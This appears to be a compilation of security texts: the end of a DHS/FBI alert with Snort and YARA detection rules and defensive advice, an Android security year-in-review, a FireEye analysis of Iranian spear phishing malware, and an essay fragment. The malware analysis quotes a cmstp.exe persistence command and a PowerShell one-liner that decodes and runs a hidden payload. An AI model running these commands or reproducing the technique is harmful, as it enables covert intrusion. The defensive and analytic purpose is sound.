alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)


alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)
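As a quick sanity check outside of Snort, the PCRE from the Go-http-client signature above can be exercised directly; Snort's /U modifier only restricts matching to the normalized URI buffer, so the pattern body is ordinary PCRE. The sample URI below is made up for illustration:

```python
import re

# PCRE body from the Go-http-client signature above.
beacon_uri = re.compile(r"\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&")

# A made-up URI shaped like the beacon traffic the rule targets:
# a 3-char parameter name and a 32-char lowercase hex/alnum value.
sample = "/update/check.aspx?abc=0123456789abcdef0123456789abcdef&x=1"
print(bool(beacon_uri.search(sample)))
```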

YARA Rules

This is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.



rule APT_malware_1
{
    meta:
        description = "inveigh pen testing tools & related artifacts"
        author = "DHS | NCCIC Code Analysis Team"
        date = "2017/07/17"
        hash0 = "61C909D2F625223DB2FB858BBDF42A76"
        hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
        hash2 = "BA756DD64C1147515BA2298B6A760260"
        hash3 = "8943E71A8C73B5E343AA9D2E19002373"
        hash4 = "04738CA02F59A5CD394998A99FCD9613"
        hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
        hash6 = "65A1A73253F04354886F375B59550B46"
        hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
        hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
        hash9 = "722154A36F32BA10E98020A8AD758A7A"
        hash10 = "4595DBE00A538DF127E0079294C87DA0"

    strings:
        $s0 = "file://"
        $s1 = "/ame_icon.png"
        $s2 = ""
        $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }
        $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }
        $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"
        $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
        $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="
        $s8 = "NlZzSZk="
        $s9 = "WlJTb1q5kaxqZaRnser3sw=="
        $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
        $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"
        $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"
        $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }
        $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }
        $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }
        //inveigh pentesting tools
        $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }
        //specific malicious word document PK archive
        $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }
        $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }
        $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }
        $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
        $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
        $s22 = ""
        $s23 = ""
        $s24 = "/1/ree_stat/p"
        $s25 = "/icon.png"
        $s26 = "/pshare1/icon"
        $s27 = "/notepad.png"
        $s28 = "/pic.png"
        $s29 = ""

    condition:
        ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)
}





rule APT_malware_2
{
    meta:
        description = "rule detects malware"
        author = "other"

    strings:
        $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }
        $http_push = "X-mode: push" nocase
        $http_pop = "X-mode: pop" nocase

    condition:
        any of them
}





rule Query_XML_Code_MAL_DOC_PT_2
{
    meta:
        name = "Query_XML_Code_MAL_DOC_PT_2"
        author = "other"

    strings:
        $zip_magic = { 50 4b 03 04 }
        $dir1 = "word/_rels/settings.xml.rels"
        $bytes = { 8c 90 cd 4e eb 30 10 85 d7 }

    condition:
        $zip_magic at 0 and $dir1 and $bytes
}





rule Query_Javascript_Decode_Function
{
    meta:
        name = "Query_Javascript_Decode_Function"
        author = "other"

    strings:
        $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
        $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
        $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
        $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}

    condition:
        filesize < 20KB and #func_call > 20 and all of ($decode*)
}






rule Query_XML_Code_MAL_DOC
{
    meta:
        name = "Query_XML_Code_MAL_DOC"
        author = "other"

    strings:
        $zip_magic = { 50 4b 03 04 }
        $dir = "word/_rels/" ascii
        $dir2 = "word/theme/theme1.xml" ascii
        $style = "word/styles.xml" ascii

    condition:
        $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
}





rule z_webshell
{
    meta:
        description = "Detection for the z_webshell"
        author = "DHS NCCIC Hunt and Incident Response Team"
        date = "2018/01/25"
        md5 = "2C9095C965A55EFC46E16B86F9B7D6C6"

    strings:
        $aspx_identifier1 = "<%@ " nocase ascii wide
        $aspx_identifier2 = "<asp:" nocase ascii wide
        $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide
        $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide
        $webshell_name = "public string z_progname =" nocase ascii wide
        $webshell_password = "public string Password =" nocase ascii wide

    condition:
        1 of ($aspx_identifier*)
        and #script_import > 10
        and #case_string > 7
        and 2 of ($webshell_*)
        and filesize < 100KB
}



These threat actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.


DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.


Network and Host-based Signatures

DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.


Detections and Prevention Measures

  • Users and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:
    • network intrusion detection system/network intrusion protection system logs,
    • web content logs,
    • proxy server logs,
    • domain name server resolution logs,
    • packet capture (PCAP) repositories,
    • firewall logs,
    • workstation Internet browsing history logs,
    • host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,
    • data loss prevention logs,
    • exchange server logs,
    • user mailboxes,
    • mail filter logs,
    • mail content logs,
    • AV mail logs,
    • OWA logs,
    • Blackberry Enterprise Server logs, and
    • Mobile Device Management logs.
  • To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:
    • application logs,
    • IIS/Apache logs,
    • file system,
    • intrusion detection system/ intrusion prevention system logs,
    • PCAP repositories,
    • firewall logs, and
    • reverse proxy.
  • Detect spear-phishing by searching workstation file systems and network-based user directories for attachment filenames and hashes found in the IOC packages.
  • Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.
  • Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.
  • Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.
  • Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.
  • Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.
  • Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.
  • Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.
  • Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.
  • Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)
  • Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.
  • Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.
  • Detect installation by searching all proxy logs for downloads from URIs without domain names.
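The last check above (downloads from URIs without domain names, i.e., a raw IP address in place of a hostname) is straightforward to automate against exported proxy logs; a rough Python sketch, assuming one URL per log entry:

```python
import ipaddress
from urllib.parse import urlsplit

def is_ip_url(url):
    """True if the URL's host is a literal IP address rather than a domain name."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def flag_ip_downloads(log_urls):
    """Return the log entries whose URI lacks a domain name."""
    return [u for u in log_urls if is_ip_url(u)]
```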


General Best Practices Applicable to this Campaign:

  • Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.
  • Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.
  • Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).
  • Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.
  • Segment any critical networks or control systems from business systems and networks according to industry best practices.
  • Ensure adequate logging and visibility on ingress and egress points.
  • Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.
  • Block RDP connections originating from untrusted external addresses unless an exception exists; review exceptions regularly for validity.
  • Store system logs of mission critical systems for at least one year within a security information event management tool.
  • Ensure applications are configured to log the proper level of detail for an incident response investigation.
  • Consider implementing HIPS or other controls to prevent unauthorized code execution.
  • Establish least-privilege controls.
  • Reduce the number of Active Directory domain and enterprise administrator accounts.
  • Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.
  • Establish a password policy to require complex passwords for all users.
  • Ensure that accounts for network administration do not have external connectivity.
  • Ensure that network administrators use non-privileged accounts for email and Internet access.
  • Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).
  • Implement a process for logging and auditing activities conducted by privileged accounts.
  • Enable logging and alerting on privilege escalations and role changes.
  • Periodically conduct searches of publicly available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.
  • Assign sufficient personnel to review logs, including records of alerts.
  • Complete independent security (as opposed to compliance) risk review.
  • Create and participate in information sharing programs.
  • Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.


Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division ( or 855-292-3937).


Revision History

  • March 15, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Android Security 2017 Year in Review

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at:

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.

Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.

Security updates

While Google Play Protect is a great shield against PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.

New security features in Android Oreo

We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.

Openness makes Android security stronger

We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million, pushing our total rewards past $2 million since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced the Google Play Security Rewards Program, which offers a bonus bounty to researchers who discover select critical vulnerabilities in apps hosted on Play and disclose them to the apps’ developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).

We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign


From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine's IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.

Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64-encoded PowerShell command, which is decoded and executed by PowerShell via a command line generated by the VBS file when it is run with WScript.exe. The process chain is shown in Figure 2.

Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64-encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.

Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we explain later in this post.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:

Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow; a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.

Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.

Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.

Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.

Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard-coded path: C:\programdata. Because the path is hard coded, execution will only be observed on Windows 7 and later operating systems. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:


That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.

Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is obfuscated JavaScript. The main function performed by the SCT file is to Base64-decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))

The rest of the malicious activities are performed by the PowerShell Script.
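The SCT file's decode step ([System.Convert]::FromBase64String followed by the “Unicode”, i.e., UTF-16LE, text decoding) can be reproduced outside PowerShell when analyzing a recovered WindowsDefender.ini-style payload; a Python sketch (the sample payload is ours, not actual malware):

```python
import base64

def decode_payload(ini_text):
    """Mirror the SCT decode step: Base64-decode, then interpret the
    bytes as UTF-16LE (what .NET calls the "Unicode" encoding)."""
    return base64.b64decode(ini_text).decode("utf-16-le")

def encode_payload(script):
    """Inverse operation, as the macro would have prepared the INI file."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")
```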

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.

Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.

Figure 11: PowerShell script is XOR encoded using a single byte key
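Both tricks are straightforward to demonstrate. The Python sketch below indexes the default Windows values of %PUBLIC% and %ComSpec% (assumed defaults) and applies a single-byte XOR; the XOR key and plaintext are illustrative, not the malware's actual values:

```python
# Environment-variable indexing: the default values of %PUBLIC% and
# %ComSpec% spell out "iex" / "Iex" when indexed character by character.
public = r"C:\Users\Public"
comspec = r"C:\WINDOWS\system32\cmd.exe"
print(public[13] + public[5] + "x")              # -> iex
print("".join(comspec[i] for i in (4, 26, 25)))  # -> Iex

# Single-byte XOR: the same operation both encodes and decodes,
# so recovering the script only requires finding the one-byte key.
key = 0x42  # illustrative key
plain = b"Invoke-Expression"
cipher = bytes(b ^ key for b in plain)
assert bytes(b ^ key for b in cipher) == plain
```

Because single-byte XOR has only 255 possible keys, this layer is trivially brute-forced during analysis; its purpose is evading static signatures, not resisting analysts.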

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store PowerShell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.

Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.
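Textbook RSA with raw exponents works the same way regardless of key size. A toy Python sketch with deliberately tiny, insecure parameters (the script's real key material is not reproduced here):

```python
# Textbook RSA with tiny illustrative parameters (never secure in practice).
p, q = 61, 53
n = p * q   # modulus: 3233
e = 17      # public exponent
d = 2753    # private exponent: modular inverse of e mod (p-1)*(q-1)

message = 65
cipher = pow(message, e, n)          # encrypt with the public exponent
recovered = pow(cipher, d, n)        # decrypt with the private exponent
assert recovered == message
```

The malware only needs the exponents and modulus as integers, which is why they can be embedded directly as script variables in Section 1.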

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:

Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.

Figure 14: System shut down upon discovery of security tools

  • Ability to receive a PowerShell script from the C2 server and execute it on the machine. Several techniques are employed for executing the PowerShell code:
    • If the command starts with “excel”, then it leverages the DDEInitiate method of Excel.Application to execute the code.
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code.
    • If the command starts with “risk”, then execution is performed through a DCOM object.
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV

Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.

Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The main C2 command functions supported by this PowerShell script are:

  • Reboot the system using the shutdown command
  • Shut down the system using the shutdown command
  • Wipe the drives C:\, D:\, E:\, and F:\
  • Take a screenshot of the system
  • Encrypt and upload information from the system
  • Leverage the Excel.Application COM object for code execution
  • Leverage the Outlook.Application COM object for code execution
  • Leverage a DCOM object for code execution

This activity shows us that TEMP.Zagros stays up to date with the latest code execution and persistence techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they hinder reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

The macro-based documents observed include:

  • Invest in Turkey.doc
  • güvenlik yönergesi. .doc
  • Türkiye Cumhuriyeti Kimlik Kartı.doc
  • Turkish Armed Forces.doc
  • Connectel .pk.doc
  • Gvenlik Ynergesi.doc
  • Gvenlik Ynergesi.doc
  • Anadolu Güneydoğu Projesinde .doc


Network Indicators

List of Proxy URLs

Security Tools Checked on the Machine

Measure Security Performance, Not Policy Compliance

I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

